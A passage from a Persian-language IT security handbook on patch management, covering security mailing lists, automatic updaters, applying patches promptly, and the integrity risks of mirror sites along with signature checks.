‫ﺍﮔﺮ ﻫﻴﭻ ﻣﻴﺰﺑﺎﻥ ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻳﺎ ﻣﻨﺎﺳﺐ ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺖ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺷﻮﺩ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﻗﺒﻞ ﺍﺯ ﺁﻧﻜـﻪ ﺍﺻـﻼﺣﺎﺕ‬
‫ﺍﻋﻤﺎﻝ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﻤﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﺗـﺎ ﺣـﺪ‬
‫ﺍﻣﻜﺎﻥ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺭﺍ ﻛﻮﺗﺎﻩ ﻧﻤﺎﻳﻴﺪ ‪ -‬ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﻛﻪ ﺍﺻﻼﺡﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ‪ download‬ﺷﻮﻧﺪ ‪ -‬ﻭ ﺳﭙﺲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺻـﻼﺡﻫـﺎ‬
‫ﺩﺭﺣﺎﻝ ﻧﺼﺐ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺑﻄﻮﺭ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺷﺒﻜﻪ ﺟﺪﺍ ﺳﺎﺯﻳﺪ‪ .‬ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺗﺼﺎﻝ ﺩﺳـﺘﮕﺎﻩ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﺩﻳـﻮﺍﺭﺓ‬
‫ﺁﺗﺶ ‪ Stateful‬ﻳﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺗﺮﺟﻤﺔ ﻣﻲﻛﻨﺪ ﻣﺤﺎﻓﻈﺖ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻤﻦﺗﺮ ﻫﻢ ﺑﺸﻮﺩ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛـﻪ ﺗﻨﻬـﺎ‬
‫ﺑﺴﺘﻪﻫﺎﻳﻲ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺑﺮﺳﻨﺪ ﮐﻪ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺗﺼﺎﻟﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺷﺮﻭﻉ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﻧﻤﻲﺩﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻧﺼﺐ ﻛﺮﺩﻩﺍﻳﺪ ﻳﺎ ﻧﻪ ﺭﺍ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻳﻚ ﺟـﺰﺀ ﻣﻬـﻢ ﻓﺮﺁﻳﻨـﺪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ‪ ،‬ﻛـﺸﻒ ﻭ‬
‫ﻻ ﺍﺯ‬
‫ﺭﺩﻳﺎﺑﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪﻱ ﺍﺳﺖ ﻛﻪ ﻧﺼﺐ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﻨﺪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﭼﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺳﺎﺱ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ‬
‫ﻻ ﺑﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻫﻤﺔ ﻣﺘﻨﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺼﺐ ﺷﺪﻩ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻭﺍﺣﺪ ‪ -‬ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺮﺳﻲ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‬ ‫ﻣﺘﻦ ﻣﻌﻤﻮ ﹰ‬
‫‪ -‬ﺍﺳﺘﻮﺍﺭ ﺍﺳﺖ‪.‬‬

‫‪111 Versioning Systems‬‬


‫‪112 Concurrent Versioning System‬‬
‫‪٣٠٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﺻﻼﺡﻫﺎ‬


‫ﭼﻨﺪ ﻣﻄﻠﺐ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺻﻼﺡﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺍﻧﻮﺍﻉ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Unix‬ﻭ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺍﺻﻠﻲ ﻣﺜﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﺑـﺮﺍﻱ ﺍﻋـﻼﻡ ﺍﻧﺘـﺸﺎﺭ‬ ‫•‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪ ﺩﺍﺭﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺮﺍﻱ ﺑﻮﻟﺘﻨﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻛـﺰ‬
‫ﭘﺮﻭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻛﻨﺪ )‪ .(http://register.microsoft.com/regsys/pic.asp‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑـﺮﺍﻱ‬
‫ﺍﻋﻼﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﻣﺠﺰﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﮔﺮﻭﻫﻬﺎﻱ ﭘﺴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﻣﺎﻧﻨـﺪ ‪ BugTraq‬ﻭ ‪ NT-BugTraq‬ﺍﺧﻄﺎﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ‬ ‫•‬
‫ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﮔﺮﻭﻫﻬﺎ ﻧﺎﻡﻧﻮﻳﺴﻲ ﻛﻨﻴﺪ )ﻣﺜ ﹰﻼ ﺩﺭ ﺣﺎﻟﺖ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻣﻬﺎﻱ ﺧﻼﺻﻪ( ﻭ ﺑﻪ ﭘﻴﺎﻣﻬﺎ ﺗﻮﺟﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒﺮﻱ ﻣـﺮﺗﺒﻂ‬ ‫•‬
‫ﺑﺎ ‪ Usenet‬ﭘﺴﺖ ﻣﻲﻛﻨﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻃﻼﻋﻴﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﺑﻨﺎﻡ ‪ BIND‬ﺩﺭ ‪ comp.protocols.dns.bind‬ﻣﻲﺁﻳﺪ(‪ .‬ﺑﻄﻮﺭ ﻣـﻨﻈﻢ‬
‫ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ﺳﺮ ﺑﺰﻧﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﺓ ﺷﻤﺎ ﺩﻳﺴﮏ ﻓﺸﺮﺩﺓ ﺣﺎﻭﻱ ﺍﺻﻼﺡﻫﺎ ﺭﺍ ﺗﻮﺯﻳﻊ ﻣﻲﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳـﻦ ﺩﻳـﺴﮑﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻣﻤﻜـﻦ‬ ‫•‬
‫ﺍﺳﺖ ﺍﺻﻼﺡﻫﺎﻱ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﺎ ﻫﻤﺎﻥ ﻟﺤﻈﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻜﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ ﭼﻮﻥ ﺗﻌﺪﺍﺩ ﺍﺻﻼﺡﻫـﺎﻳﻲ‬
‫ﻛﻪ ﺑﺎﻳﺪ ‪ download‬ﺷﻮﻧﺪ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺯﻳﺎﺩﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻥ ﺧﻮﺩﻛﺎﺭ‪ ،‬ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺭﺍ ﺑـﺎ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ ﺭﻭﻱ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬ ‫•‬
‫ﻓﺮﻭﺷﻨﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﻨﺪ ﻭ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﺑﺴﺘﻪﺑﻨﺪﻱ ﺑـﻪﺭﻭﺯ ﻧﻴـﺴﺖ‪ .‬ﺑﻴـﺸﺘﺮ ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﮕﻮﻧـﻪﺍﻱ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺭﺗﻘﺎ ﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ‪ download‬ﻭ ﻧﺼﺐ ﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺑـﺮﺍﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻗﺒﻠﻲ‬
‫ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻛﻨﻨﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪.‬‬
‫ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺮﺍﻱ ﻧﺴﺨﻪﻫـﺎﻱ ﺟﺪﻳـﺪ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺑﺮﺭﺳـﻲ‬ ‫•‬
‫ﻛﻨﻴﺪ‪.‬‬
‫ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺩﺭ ﺧﺼﻮﺹ ﺍﺻﻼﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻄﺎﻟﺒﻲ ﺁﻣﻮﺧﺘﻴﺪ‪ ،‬ﺗﺄﻣﻞ ﻧﻜﻨﻴﺪ ﻭ ﺑﻼﻓﺎﺻﻠﻪ ﺁﻧﻬﺎ ﺭﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺑﺼﻮﺭﺕ ﻋﻤﻮﻣﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﻧﺪ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻼﻓﺎﺻﻠﻪ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪) .‬ﺍﺻﻼﺣﻬﺎﻳﻲ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺍﺻﻼﺡ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻨﺪ ﺑﻪ ﺍﻳﻦ ﺍﻧﺪﺍﺯﻩ ﻓﻮﺭﻳﺖ ﻧﺪﺍﺭﻧﺪ‪(.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫‪ Download‬ﻭ ﺑﺮﺭﺳﻲ ﺍﺻﻼﺡﻫﺎ‬


‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻫﺮﻳﻚ ﺍﺯ ﺍﺻﻼﺣﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ،‬ﻣﺠﺒﻮﺭ‬
‫ﻻ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ﻳـﺎ‬ ‫ﻫﺴﺘﻴﺪ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺍﺯ ﺟﺎﻳﻲ ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﺩ‪ ،‬ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ‪ FTP‬ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﭘﺎﺳﺨﮕﻮﻱ ﺧﻴﻞ ﺗﻘﺎﺿﺎﻫﺎ ﺑﺮﺍﻱ ‪ download‬ﺁﻥ ﺑﺎﺷـﺪ‪ ،‬ﻟـﺬﺍ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺎﻳﺘﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ‪ ١١٣‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﻣﺸﺎﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻻ ﻫـﺮ‬‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺸﻮﻳﻖ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ )ﺩﺭ ﺟﻐﺮﺍﻓﻴﺎﻱ ﺷﺒﻜﻪ( ‪ download‬ﻛﻨﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺍﺯ ﻫﻤﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺎﻳﮕﺎﻩ ﻓﺮﻭﺷﻨﺪﻩ )ﻣﻌﻤﻮ ﹰﻻ ﺑﻄﻮﺭ ﺭﻭﺯﺍﻧﻪ( ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪113 Mirror Sites‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠٤‬‬

‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻥ ﻣﻴﺰﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ١١٤‬ﺍﺯ ﻃﺮﻳﻖ ﺗﻜﺮﺍﺭ‪ ،‬ﻳﻚ ﻣﺰﻳـﺖ ﻣﻬـﻢ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺣـﺴﺎﺏ‬
‫ﻣﻲﺁﻳﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺯﻣﺎﻧﻲ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﺍﺭﺗﺒﺎﻁ ﺳﺮﻳﻊ ﻭ ﺑﺎ ﭘﺎﻳﮕـﺎﻩ ﺍﺻـﻠﻲ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﭼﻨﺪ ﻧﮕﺮﺍﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪:‬‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻧﻌﻜﺎﺳﻲ ﻛﻨﺘﺮﻝ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺧـﺮﺍﺏ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺎ‬ ‫•‬
‫ﻳﻚ ﻧﺴﺨﺔ ﺁﻟﻮﺩﻩ ﺑﻪ ﺗﺮﺍﻭﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ‪ . ...‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺷﻤﺎ ﻧﻪﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺑﻪ ﻓﺮﻭﺷﻨﺪﻩ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺭﺍﻫﺒـﺮﺍﻥ‬
‫ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﻧﻴﺰ ﺍﻋﺘﻤﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻧﺮﺍ ﻧﻴﺰ ﻣﻨﺘﺸﺮ ﻛﻨﺪ )ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ‬
‫‪ PGP‬ﺑﻪ ﻫﻤﺮﺍﻩ ﺁﺭﺷﻴﻮﻫﺎﻱ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﺍﻣﻀﺎﻫﺎﻱ ‪ gnupg‬ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ‪ ،rpm‬ﻳﺎ ﺍﻣﻀﺎﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ (ActiveX‬ﭼـﻮﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻛﻠﻴـﺪ ﻋﻤـﻮﻣﻲ‬
‫ﻓﺮﻭﺷﻨﺪﻩ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺍﻭ ﻭ ﻧﻪ ﭘﺎﻳﮕﺎﻩ ﺍﻧﻌﻜﺎﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻴﺸﺘﺮ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ‬
